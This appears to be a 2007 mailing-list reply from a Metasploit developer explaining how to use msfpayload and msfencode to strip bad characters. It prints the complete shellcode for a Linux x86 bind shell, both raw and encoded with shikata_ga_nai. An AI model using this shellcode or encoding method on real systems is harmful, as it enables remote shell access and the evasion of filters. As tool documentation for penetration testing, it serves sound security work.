Building multistage payloaded exploits?

[hdm at metasploit.com (H D Moore)]

You are probably doing something wrong ;-) The msfpayload command only 
generates the raw shellcode, if you want to encode it, you need to 
generate it in "raw" mode, then pass it into msfencode, which takes 
the -b parameter defining the bad character set. For example:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * AppendExit=false, PrependSetresuid=false,
 * PrependSetuid=false, LPORT=4444, PrependSetreuid=false
 */
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

# now, lets remove the 0xcd and 0x80

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | \
msfencode -a x86 -b '\xcd\x80' -t c

[*] x86/shikata_ga_nai succeeded, final size 106

unsigned char buf[] =
"\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4"
"\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9"
"\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11"
"\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59"
"\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e"
"\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f"
"\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04"
"\x41";


-HD

On Monday 24 September 2007 18:02, scotty to hotty wrote:
> Thnx hdm for clarifying my research :P. now, i noticed problems when i
> specify bad characters in metasploit.... it always spits the payload
> out with the bad characters still in the exploit.... when i use msf2 it
> works fine but when i use msf3 it keeps everything i specify to get
> removed. any work arrounds to this problem? or am i doing something
> wrong?